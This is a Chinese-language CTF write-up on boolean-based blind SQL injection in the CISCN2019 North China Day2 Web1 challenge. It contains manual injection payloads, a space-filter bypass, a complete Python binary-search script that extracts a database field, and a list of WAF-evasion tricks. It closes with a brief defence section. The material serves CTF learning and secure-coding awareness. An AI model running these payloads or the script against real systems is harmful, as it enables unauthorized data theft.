从CISCN2019华北赛区Day2 Web1看布尔盲注：当SQL注入遇上无回显的攻防博弈

1. 布尔盲注：当SQL注入遇上无回显的攻防博弈

第一次接触布尔盲注是在CTF比赛中，当时面对一个看似简单的登录页面，无论输入什么用户名密码都只返回"登录成功"或"登录失败"。这种无回显的场景让我一度束手无策，直到理解了布尔盲注的精髓——就像玩猜数字游戏，虽然对方不会直接告诉你答案，但通过"大了"或"小了"的反馈，依然能逐步逼近正确答案。

布尔盲注是SQL注入的一种特殊形式，它最大的特点就是目标系统不会直接返回数据库错误信息或查询结果。在CISCN2019华北赛区Day2 Web1这道题中，输入1'会返回bool(false)，这就是典型的布尔盲注场景。攻击者需要像侦探一样，通过观察页面返回的不同状态（正常/错误、存在/不存在）来推断数据库中的信息。

2. 从零开始理解布尔盲注原理

2.1 布尔盲注与传统SQL注入的区别

传统SQL注入就像直接问数据库要答案，而布尔盲注则像是在玩二十个问题游戏——每次只能得到"是"或"否"的回答。在BUUCTF平台的这道题中，当我们输入1' or '1'='1时，系统提示"已检测SQL注入"，这说明存在过滤机制，需要更隐蔽的攻击方式。

布尔盲注的核心在于构造能产生布尔值（真/假）的查询条件。比如：

sql复制1' and (select length(flag) from flag)=32 -- 

这个payload会检查flag字段的长度是否为32。如果页面返回正常，说明猜测正确；返回错误则说明长度不对。

2.2 关键函数在盲注中的应用

在实战中，我们主要依赖几个关键函数：

1. length()：确定字符串长度

sql复制1' and (select length(flag) from flag)<50 -- 

2. substr()/substring()：截取字符串特定位置字符

sql复制1' and substr((select flag from flag),1,1)='f' -- 

3. ascii()：将字符转为ASCII码，便于逐位比较

sql复制1' and ascii(substr((select flag from flag),1,1))>100 -- 

在CISCN2019这道题中，题目提示flag存储在flag表的flag字段中，这省去了猜表名和字段名的步骤。但实际比赛中，往往需要通过information_schema先获取这些信息。

3. 手工测试：从注入点到数据泄露

3.1 判断注入类型和过滤规则

我习惯先用一组简单测试判断注入点：

• 输入1 → 正常
• 输入1' → 报错（确认字符型注入）
• 输入1' and 1=1 -- → 被过滤
• 输入1'^1^'1 → 测试绕过方式

这道题过滤了空格，可以用括号代替：

sql复制1'^(ascii(substr((select(flag)from(flag)),1,1))>100)^'1

3.2 逐位爆破flag的实战过程

假设我们已经确认flag长度为32，下面是手工爆破第一位的过程：

1. 先确定ASCII范围：

sql复制1'^(ascii(substr((select(flag)from(flag)),1,1))>127)^'1 → 返回正常，说明<=127

2. 二分法缩小范围：

sql复制1'^(ascii(substr((select(flag)from(flag)),1,1))>64)^'1 → 返回异常，说明>64

3. 继续二分：

sql复制1'^(ascii(substr((select(flag)from(flag)),1,1))>96)^'1 → 返回正常，说明<=96

4. 最终确定：

sql复制1'^(ascii(substr((select(flag)from(flag)),1,1))=102)^'1 → 返回正常，确认是'f'(ASCII 102)

这个过程需要重复32次（flag长度），手工操作极其耗时，这也是为什么我们需要自动化脚本。

4. 自动化攻击：编写布尔盲注脚本

4.1 二分法爆破脚本解析

以下是改进版的Python爆破脚本，添加了详细注释：

python复制import requests
import time

url = 'http://target_url'  # 替换为实际目标URL
flag = ''

for i in range(1, 33):  # 假设flag长度为32
    low = 32   # 可打印字符最小ASCII
    high = 126  # 可打印字符最大ASCII
    while low <= high:
        mid = (low + high) // 2
        # 构造payload，注意绕过空格过滤
        payload = f"1'^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})^'1"
        
        try:
            r = requests.post(url, data={'id': payload}, timeout=5)
            time.sleep(0.1)  # 避免请求过快被封
            
            # 根据页面特征判断真假
            if 'Hello' in r.text:  # 正常页面特征
                high = mid - 1
            else:
                low = mid + 1
        except Exception as e:
            print(f"请求失败: {e}")
            break
    
    if low > high:
        flag += chr(low)
        print(f"[*] 当前flag: {flag}")
    else:
        print(f"[!] 第{i}位爆破失败")
        flag += '?'

print(f"[+] 最终flag: {flag}")

4.2 脚本优化技巧

1. 延迟设置：适当增加time.sleep()避免被封
2. 错误处理：添加try-except应对网络问题
3. 模糊匹配：改进页面特征判断逻辑
4. 并行处理：可以使用多线程加速爆破

在实际比赛中，我遇到过需要处理以下几种情况：

• 过滤了比较运算符(>,=)：可以用between...and...替代
• 过滤了substr：可以用right(left(str,pos),1)替代
• 过滤了ascii：可以用hex()或ord()替代

5. 防御布尔盲注的最佳实践

5.1 开发者防护方案

1. 参数化查询：这是最有效的防护手段

python复制# Python示例
cursor.execute("SELECT * FROM articles WHERE id = %s", (article_id,))

2. 输入验证：限制输入类型和长度
3. 错误处理：统一返回模糊错误信息
4. WAF规则：过滤常见注入特征

5.2 渗透测试中的绕过技巧

即使遇到防护，攻击者仍可能尝试：

1. 大小写混合：SeLeCt代替select
2. 注释分割：sel/xxx/ect
3. 等价函数：mid()代替substr()
4. 编码绕过：十六进制或URL编码

在CISCN2019这道题中，过滤规则相对简单，只需要处理空格问题。但在真实环境中，可能需要组合多种绕过技术。

布尔盲注的魅力在于它像一场精心设计的逻辑博弈，攻击者和防御者都在不断升级自己的策略。理解这种技术的原理不仅有助于CTF比赛，更能帮助开发者构建更安全的系统。每次解决这样的挑战，都让我对Web安全有更深的理解——安全不是绝对的黑与白，而是攻防双方持续的技术较量。